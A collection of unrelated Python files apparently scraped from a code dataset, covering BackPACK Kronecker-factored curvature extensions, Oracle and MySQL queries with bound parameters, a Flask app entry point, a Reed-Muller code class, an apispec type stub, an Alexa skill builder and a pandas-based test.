Dropout,
Flatten,
Linear,
MaxPool2d,
MSELoss,
ReLU,
Sigmoid,
Tanh,
ZeroPad2d,
)
from backpack.extensions.backprop_extension import BackpropExtension
from backpack.extensions.curvature import Curvature
from backpack.extensions.secondorder.hbp.hbp_options import (
BackpropStrategy,
ExpectationApproximation,
LossHessianStrategy,
)
from . import activations, conv2d, dropout, flatten, linear, losses, padding, pooling
class HBP(BackpropExtension):
    """Base class for Hessian backpropagation (HBP) extensions.

    Registers, per supported ``torch.nn`` module type, the HBP extension
    that propagates curvature through it, and stores the four strategy
    choices that the concrete subclasses (KFAC, KFLR, KFRA) pin down.
    """
    def __init__(
        self,
        curv_type,
        loss_hessian_strategy,
        backprop_strategy,
        ea_strategy,
        savefield="hbp",
    ):
        """
        :param curv_type: curvature to propagate (see ``Curvature``).
        :param loss_hessian_strategy: how the loss Hessian is obtained
            (see ``LossHessianStrategy``).
        :param backprop_strategy: how curvature is propagated backwards
            (see ``BackpropStrategy``).
        :param ea_strategy: expectation approximation to use
            (see ``ExpectationApproximation``).
        :param str savefield: attribute name under which results are stored.
        """
        self.curv_type = curv_type
        self.loss_hessian_strategy = loss_hessian_strategy
        self.backprop_strategy = backprop_strategy
        self.ea_strategy = ea_strategy
        super().__init__(
            savefield=savefield,
            fail_mode="ERROR",
            module_exts={
                MSELoss: losses.HBPMSELoss(),
                CrossEntropyLoss: losses.HBPCrossEntropyLoss(),
                Linear: linear.HBPLinear(),
                MaxPool2d: pooling.HBPMaxpool2d(),
                AvgPool2d: pooling.HBPAvgPool2d(),
                ZeroPad2d: padding.HBPZeroPad2d(),
                Conv2d: conv2d.HBPConv2d(),
                Dropout: dropout.HBPDropout(),
                Flatten: flatten.HBPFlatten(),
                ReLU: activations.HBPReLU(),
                Sigmoid: activations.HBPSigmoid(),
                Tanh: activations.HBPTanh(),
            },
        )
    def get_curv_type(self):
        """Return the configured curvature type."""
        return self.curv_type
    def get_loss_hessian_strategy(self):
        """Return the configured loss-Hessian strategy."""
        return self.loss_hessian_strategy
    def get_backprop_strategy(self):
        """Return the configured backpropagation strategy."""
        return self.backprop_strategy
    def get_ea_strategy(self):
        """Return the configured expectation-approximation strategy."""
        return self.ea_strategy
class KFAC(HBP):
    """
    Approximate Kronecker factorization of the Generalized Gauss-Newton/Fisher
    using Monte-Carlo sampling.
    Stores the output in :code:`kfac` as a list of Kronecker factors.
    - If there is only one element, the item represents the GGN/Fisher
    approximation itself.
    - If there are multiple elements, they are arranged in the order such
    that their Kronecker product represents the Generalized Gauss-Newton/Fisher
    approximation.
    - The dimension of the factors depends on the layer, but the product
    of all row dimensions (or column dimensions) yields the dimension of the
    layer parameter.
    .. note::
        The literature uses column-stacking as vectorization convention,
        but ``torch`` defaults to a row-major storing scheme of tensors.
        The order of factors might differ from the presentation in the literature.
    Implements the procedures described by
    - `Optimizing Neural Networks with Kronecker-factored Approximate Curvature
    <http://proceedings.mlr.press/v37/martens15.html>`_
    by James Martens and Roger Grosse, 2015.
    - `A Kronecker-factored approximate Fisher matrix for convolution layers
    <http://proceedings.mlr.press/v48/grosse16.html>`_
    by Roger Grosse and James Martens, 2016
    """
    def __init__(self, mc_samples=1):
        """
        :param int mc_samples: number of Monte-Carlo samples used to
            approximate the loss Hessian (default: 1).
        """
        self._mc_samples = mc_samples
        super().__init__(
            curv_type=Curvature.GGN,
            loss_hessian_strategy=LossHessianStrategy.SAMPLING,
            backprop_strategy=BackpropStrategy.SQRT,
            ea_strategy=ExpectationApproximation.BOTEV_MARTENS,
            savefield="kfac",
        )
    def get_num_mc_samples(self):
        """Return the number of Monte-Carlo samples."""
        return self._mc_samples
class KFRA(HBP):
    """
    Approximate Kronecker factorization of the Generalized Gauss-Newton/Fisher
    using the full Hessian of the loss function w.r.t. the model output
    and averaging after every backpropagation step.
    Stores the output in :code:`kfra` as a list of Kronecker factors.
    - If there is only one element, the item represents the GGN/Fisher
    approximation itself.
    - If there are multiple elements, they are arranged in the order such
    that their Kronecker product represents the Generalized Gauss-Newton/Fisher
    approximation.
    - The dimension of the factors depends on the layer, but the product
    of all row dimensions (or column dimensions) yields the dimension of the
    layer parameter.
    .. note::
        The literature uses column-stacking as vectorization convention.
        This is in contrast to the default row-major storing scheme of tensors
        in :code:`torch`. Therefore, the order of factors differs from the
        presentation in the literature.
    Implements the procedures described by
    - `Practical Gauss-Newton Optimisation for Deep Learning
    <http://proceedings.mlr.press/v70/botev17a.html>`_
    by Aleksandar Botev, Hippolyt Ritter and David Barber, 2017.
    Extended for convolutions following
    - `A Kronecker-factored approximate Fisher matrix for convolution layers
    <http://proceedings.mlr.press/v48/grosse16.html>`_
    by Roger Grosse and James Martens, 2016
    """
    def __init__(self):
        """Configure GGN curvature with summed loss Hessian and batch averaging."""
        super().__init__(
            curv_type=Curvature.GGN,
            loss_hessian_strategy=LossHessianStrategy.SUM,
            backprop_strategy=BackpropStrategy.BATCH_AVERAGE,
            ea_strategy=ExpectationApproximation.BOTEV_MARTENS,
            savefield="kfra",
        )
class KFLR(HBP):
    """
    Approximate Kronecker factorization of the Generalized Gauss-Newton/Fisher
    using the full Hessian of the loss function w.r.t. the model output.
    Stores the output in :code:`kflr` as a list of Kronecker factors.
    - If there is only one element, the item represents the GGN/Fisher
    approximation itself.
    - If there are multiple elements, they are arranged in the order such
    that their Kronecker product represents the Generalized Gauss-Newton/Fisher
    approximation.
    - The dimension of the factors depends on the layer, but the product
    of all row dimensions (or column dimensions) yields the dimension of the
    layer parameter.
    .. note::
        The literature uses column-stacking as vectorization convention.
        This is in contrast to the default row-major storing scheme of tensors
        in :code:`torch`. Therefore, the order of factors differs from the
        presentation in the literature.
    Implements the procedures described by
    - `Practical Gauss-Newton Optimisation for Deep Learning
    <http://proceedings.mlr.press/v70/botev17a.html>`_
    by Aleksandar Botev, Hippolyt Ritter and David Barber, 2017.
    Extended for convolutions following
    - `A Kronecker-factored approximate Fisher matrix for convolution layers
    <http://proceedings.mlr.press/v48/grosse16.html>`_
    by Roger Grosse and James Martens, 2016
    """
    def __init__(self):
        """Configure GGN curvature with the exact loss Hessian and sqrt backprop."""
        super().__init__(
            curv_type=Curvature.GGN,
            loss_hessian_strategy=LossHessianStrategy.EXACT,
            backprop_strategy=BackpropStrategy.SQRT,
            ea_strategy=ExpectationApproximation.BOTEV_MARTENS,
            savefield="kflr",
        )
|
import Choice
def ora_datafile(curs, conn):
    """Interactively report the data files of an Oracle tablespace.

    Prompts for a tablespace name, lists each data file's path, current
    size and auto-extension limit, then loops / returns to the parent menu
    depending on user input.

    :param curs: open Oracle cursor.
    :param conn: open Oracle connection (passed through to Choice.choice).
    """
    tbsnm = input("请输入表空间名:")
    # Security fix: bind the tablespace name instead of interpolating it
    # into the SQL text -- the previous str.format() version was open to
    # SQL injection via the interactive prompt.
    df = ("select rownum,file_name,bytes/1024/1024,AUTOEXTENSIBLE,maxbytes/1024/1024 "
          "from dba_data_files where tablespace_name=:tbs order by 1")
    rr = curs.execute(df, {'tbs': tbsnm.upper()})
    for result in rr:
        rowno = result[0]
        dfnm = result[1]
        dfsz = result[2]
        autoextensible = result[3]
        maxsz = result[4]
        if autoextensible == 'YES':
            print('表空间{}的第{}个数据文件路径是{},当前大小为{}MB,数据文件可扩展到{}MB。'.format(tbsnm, rowno, dfnm, dfsz, maxsz))
        else:
            print('表空间{}的第{}个数据文件路径是{},当前大小为{}MB,数据文件不可扩展。'.format(tbsnm, rowno, dfnm, dfsz))
    incont = input("是否继续查询数据文件:(输入1继续,输入0返回上一菜单,其他输入退出)")
    if incont == '1':
        # NOTE(review): recursion as a menu loop grows the stack on every
        # repeat; a while-loop would be safer, kept as-is to preserve flow.
        ora_datafile(curs, conn)
    elif incont == '0':
        Choice.choice(curs, conn)
    else:
        return True
|
from Camel import config
from flask import request, make_response
import sys
import MySQLdb
def db_connect(config):
    """Open a MySQL connection using config['database']; exit(1) on failure.

    :param config: mapping with a 'database' section providing HOST, USER,
        PASSWORD and NAME keys.
    :return: an open MySQLdb connection.
    """
    db_conf = config['database']
    try:
        db = MySQLdb.connect(host=db_conf['HOST'],
                             user=db_conf['USER'],
                             passwd=db_conf['PASSWORD'],
                             db=db_conf['NAME'],
                             charset='utf8'
                             )
    except MySQLdb.Error as exc:
        # Fix: the original bare `except:` also swallowed SystemExit,
        # KeyboardInterrupt and config KeyErrors; catch only DB errors and
        # include the reason in the message.
        print("Can't connect to database: {}".format(exc))
        sys.exit(1)
    return db
def is_authenticated():
    """Return True when the current request carries a known session token.

    Reads the `AuthToken` HTTP header and checks it against the `sessions`
    table; opens (and closes) a fresh DB connection on every call.
    """
    if 'AuthToken' in request.headers:
        token = request.headers['AuthToken']
    else:
        return False  # no header, no session
    db = db_connect(config)
    # Parameterized query: the token is bound, not interpolated.
    sql = "SELECT `token` from `sessions` WHERE `token` = %(token)s"
    c = db.cursor()
    c.execute(sql, {'token': token})
    rows = c.fetchall()
    c.close()
    db.close()
    return len(rows)==1
|
"""This is a module"""
import os
from app.views import create_app
from database import database
config_name = os.getenv('APP_SETTINGS') # e.g. "development"; None lets create_app fall back to its default
app = create_app(config_name)
database(app)  # initialize the database against the freshly created app
if __name__ == '__main__':
    app.run(debug=True)  # NOTE(review): debug=True must not ship to production
|
import itertools
class RM:
    """Reed-Muller code RM(r, m) of length n = 2**m.

    Each generating-matrix row is stored as a single Python int whose n bits
    are the row's entries (leftmost column = most significant bit), so all
    row algebra is done with bitwise operators.
    """
    def __init__(self, r = 0, m = 1):
        # NOTE(review): the message only mentions r > m, but the check also
        # rejects r < 0 and m < 1.
        if r > m or r < 0 or m < 1:
            raise Exception("r > m")
        self.r = r  # order of the code
        self.m = m  # number of variables
        self.n = 2 ** m  # block length
        self.generating_matrix = self.__create_generating_matrix__()
        self.k = len(self.generating_matrix)  # code dimension = number of rows
    def __create_generating_matrix__(self):
        """Build the canonical RM(r, m) generating matrix.

        Rows: the all-ones row, the m degree-1 'variable' rows, then the
        bitwise AND of every combination of 2..r variable rows.
        """
        generating_matrix = [2 ** self.n - 1]  # all-ones row (degree 0)
        if self.r != 0:
            count = self.n
            # Degree-1 rows: alternating 0/1 blocks whose width halves each step.
            for m in range(self.m):
                count //= 2
                generating_matrix.append(int('0b' + 2**m * ('0'*count + '1'*count), 2))
            help_matrix = generating_matrix.copy()
            single_row = help_matrix.pop(0)
            # Higher-degree rows: AND every r-subset of the degree-1 rows.
            for r in range(2, self.r + 1):
                for combo in itertools.combinations(help_matrix, r):
                    help_row = single_row
                    for row in combo:
                        help_row &= row
                    generating_matrix.append(help_row)
        return generating_matrix
    def __bin__(self, number):
        """Render a row int as an n-character, zero-padded bit string."""
        return bin(number)[2:].zfill(self.n)
    def print(self):
        """Print the generating matrix row by row, then the dimension k."""
        # NOTE(review): this method shadows the builtin name `print`.
        for row in self.generating_matrix:
            print(self.__bin__(row))
        print()
        # print('r =', self.r)
        # print('m =', self.m)
        # print('n =', self.n)
        print('k =', self.k)
    def copy(self, another_RM):
        """Copy another_RM's parameters and matrix into this instance."""
        self.k = another_RM.k
        self.n = another_RM.n
        self.m = another_RM.m
        self.r = another_RM.r
        self.generating_matrix = another_RM.generating_matrix.copy()
    def mult_rm_matrix(self, another_RM):
        """In-place product: append all pairwise ANDs of this matrix's rows
        with another_RM's rows; the resulting order is capped at m."""
        if self.m != another_RM.m:
            raise Exception("columns are not equal")
        help_matrix = self.generating_matrix.copy()
        for row, another_row in itertools.product(help_matrix, another_RM.generating_matrix):
            new_row = row & another_row
            if new_row not in self.generating_matrix:
                self.generating_matrix.append(new_row)
        if self.r + another_RM.r < self.m:
            self.r += another_RM.r
        else:
            self.r = self.m
        self.k = len(self.generating_matrix)
    def dual(self):
        """Replace this code by its dual, in place.

        Gaussian-eliminates the matrix to a stepped form, drops zero rows,
        then reads off a parity-check matrix which becomes the new
        generating matrix; for Reed-Muller codes the dual of RM(r, m)
        is RM(m - r - 1, m).
        """
        # positions_stepped_view[col] = index of the pivot row for that
        # column, or -1 when the column has no pivot.
        positions_stepped_view = [-1] * self.n
        row_pos = 0
        while row_pos != self.k:
            remaining_rows = self.generating_matrix.copy()
            row = remaining_rows.pop(row_pos)
            column_in_row_pos = 0
            for column_in_row in self.__bin__(row):
                if column_in_row == '1':
                    # if positions_stepped_view[column_in_row_pos] == -1:
                    # Eliminate this pivot column from every other row.
                    for remaining_row in remaining_rows:
                        if self.__bin__(remaining_row)[column_in_row_pos] == '1':
                            self.generating_matrix[self.generating_matrix.index(remaining_row)] ^= row
                    positions_stepped_view[column_in_row_pos] = row_pos
                    break
                column_in_row_pos += 1
            row_pos += 1
        #
        # next step
        #
        #
        # kill null
        #
        # Remove all-zero rows; shift the recorded pivot indices accordingly.
        while 0 in self.generating_matrix:
            index = self.generating_matrix.index(0)
            self.generating_matrix.pop(index)
            for row in range(self.n):
                if positions_stepped_view[row] > index:
                    positions_stepped_view[row] -= 1
        self.k = len(self.generating_matrix)
        #
        # next step
        #
        # Assemble the dual's rows column by column: pivot-free columns get
        # an identity entry, pivot columns contribute the corresponding bits
        # of the reduced matrix.
        row_pos = 0
        single_matrix_pos = -1
        helper_matrix = []
        while row_pos != self.n - self.k:
            helper_row = ''
            single_matrix_pos = positions_stepped_view.index(-1, single_matrix_pos + 1)
            pos_in_positions = 0
            for position_stepped_view in positions_stepped_view:
                if position_stepped_view == -1:
                    if pos_in_positions == single_matrix_pos:
                        helper_row += '1'
                    else:
                        helper_row += '0'
                else:
                    helper_row += self.__bin__(self.generating_matrix[position_stepped_view])[single_matrix_pos]
                pos_in_positions += 1
            helper_matrix.append(int('0b' + helper_row, 2))
            row_pos += 1
        self.generating_matrix = helper_matrix
        self.r = self.m - self.r - 1  # dual order for Reed-Muller codes
        self.k = len(self.generating_matrix)
    def add_matrix_to_right(self, number_of_columns):
        """Append `number_of_columns` extra columns on the right.

        NOTE(review): the appended block is read column-major from the
        `new_matrix` string as new_matrix[i * self.k + j] -- confirm the
        intended pattern; it assumes number_of_columns <= self.k - 1.
        """
        new_matrix = ''
        for i in range(number_of_columns):
            new_matrix += '0' * (i + 1) + '1' + '0' * (self.k - i - 2)
        for i in range(number_of_columns):
            for j in range(self.k):
                self.generating_matrix[j] = int(self.__bin__(self.generating_matrix[j]) + new_matrix[i * self.k + j], 2)
            self.n += 1
    def conjunction(self, another_RM):
        """Stack another_RM's rows under this matrix, then dualize in place."""
        self.generating_matrix += another_RM.generating_matrix
        self.k += another_RM.k
        self.dual()
    def kick_column(self, number):
        """Delete the 0-based column `number` from the matrix (puncturing).

        :raises Exception: when the index is out of range.
        """
        number += 1  # switch to a 1-based position for the slicing below
        if number < 1 or number > self.n:
            raise Exception('Column not found')
        if number == 1:
            for row in range(self.k):
                self.generating_matrix[row] = int('0b' + self.__bin__(self.generating_matrix[row])[number:], 2)
        elif number == self.n:
            for row in range(self.k):
                self.generating_matrix[row] = int('0b' + self.__bin__(self.generating_matrix[row])[:number - 1], 2)
        else:
            for row in range(self.k):
                self.generating_matrix[row] = int('0b' + self.__bin__(self.generating_matrix[row])[:number - 1] + self.__bin__(self.generating_matrix[row])[number:], 2)
        self.n -= 1
|
"""
This type stub file was generated by pyright.
"""
from distutils import version
"""Various utilities for parsing OpenAPI operations from docstrings and validating against
the OpenAPI spec.
"""
COMPONENT_SUBSECTIONS = { 2: { "schema": "definitions","response": "responses","parameter": "parameters","security_scheme": "securityDefinitions" },3: { "schema": "schemas","response": "responses","parameter": "parameters","example": "examples","security_scheme": "securitySchemes" } }
def build_reference(component_type, openapi_major_version, component_name):
    """Return path to reference
    :param str component_type: Component type (schema, parameter, response, security_scheme)
    :param int openapi_major_version: OpenAPI major version (2 or 3)
    :param str component_name: Name of component to reference
    :return str: the JSON reference path for the component
    """
    ...
def validate_spec(spec):
    """Validate the output of an :class:`APISpec` object against the
    OpenAPI specification.
    Note: Requires installing apispec with the ``[validation]`` extras.
    ::
        pip install 'apispec[validation]'
    :param APISpec spec: the spec object to validate.
    :raise: apispec.exceptions.OpenAPIError if validation fails.
    """
    ...
class OpenAPIVersion(version.LooseVersion):
    """OpenAPI version
    :param str|OpenAPIVersion openapi_version: OpenAPI version
    Parses an OpenAPI version expressed as string. Provides shortcut to digits
    (major, minor, patch).
    Example: ::
        ver = OpenAPIVersion('3.0.2')
        assert ver.major == 3
        assert ver.minor == 0
        assert ver.patch == 2
        assert ver.vstring == '3.0.2'
        assert str(ver) == '3.0.2'
    """
    # Accepted version bounds (values elided in this stub).
    MIN_INCLUSIVE_VERSION = ...
    MAX_EXCLUSIVE_VERSION = ...
    def __init__(self, openapi_version) -> None:
        ...
    @property
    def major(self):
        """First version digit, e.g. 3 for '3.0.2'."""
        ...
    @property
    def minor(self):
        """Second version digit, e.g. 0 for '3.0.2'."""
        ...
    @property
    def patch(self):
        """Third version digit, e.g. 2 for '3.0.2'."""
        ...
def trim_docstring(docstring):
    """Uniformly trims leading/trailing whitespace from docstrings.
    Based on http://www.python.org/peps/pep-0257.html#handling-docstring-indentation
    :param str docstring: docstring to trim.
    :return str: the trimmed docstring.
    """
    ...
def dedent(content):
    """
    Remove leading indent from a block of text.
    Used when generating descriptions from docstrings.
    Note that python's `textwrap.dedent` doesn't quite cut it,
    as it fails to dedent multiline docstrings that include
    unindented text on the initial line.
    :param str content: text block to dedent.
    :return str: the dedented text.
    """
    ...
def deepupdate(original, update):
    """Recursively update a dict.
    Subdict's won't be overwritten but also updated.
    :param dict original: dict to update in place.
    :param dict update: values to merge into `original`.
    :return dict: the updated `original` mapping.
    """
    ...
|
from Dota2AbilitiesForAlexa import JsonParser
from Dota2AbilitiesForAlexa import Dota2SkillBuilder
# Parse the ability data and build the Alexa skill model from it.
myParser = JsonParser()
Dota2SkillBuilder(myParser.get_hero_abilities(), myParser.get_ability_details())
|
import pkg_resources
from datetime import datetime
from unittest.mock import sentinel
import pandas as pd
from . import process_temperature_log as module
# Path to the CSV fixture standing in for a real on-device temperature log.
temperature_log_path = pkg_resources.resource_filename(
    "osmo_camera", "test_fixtures/temperature.csv"
)
class TestProcessTemperatureLog:
    """Tests for process_temperature_log."""
    def test_parses_raw_data_and_applies_calibration(self, mocker):
        """Parses the fixture CSV and routes counts through calibration."""
        # Redirect the log-path lookup to the fixture and stub calibration
        # so the expected temperatures are sentinels.
        mocker.patch("os.path.join").return_value = temperature_log_path
        mocker.patch.object(
            module, "temperature_given_digital_count_calibrated"
        ).return_value = sentinel.temperature
        actual = module.process_temperature_log(
            experiment_dir=sentinel.mock_experiment_dir,
            local_sync_directory_path=sentinel.mock_local_sync_path,
        )
        # Expected values mirror the fixture rows; temperature_c comes from
        # the stubbed calibration function.
        expected_temperature_data = pd.DataFrame(
            {
                "capture_timestamp": [
                    datetime(2019, 4, 30, 16, 29, 5),
                    datetime(2019, 4, 30, 16, 29, 11),
                ],
                "digital_count": [20007, 19993],
                "voltage": [2.5003263, 2.5025763],
                "temperature_c": [sentinel.temperature, sentinel.temperature],
            }
        )
        pd.testing.assert_frame_equal(
            actual, expected_temperature_data, check_less_precise=True
        )
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.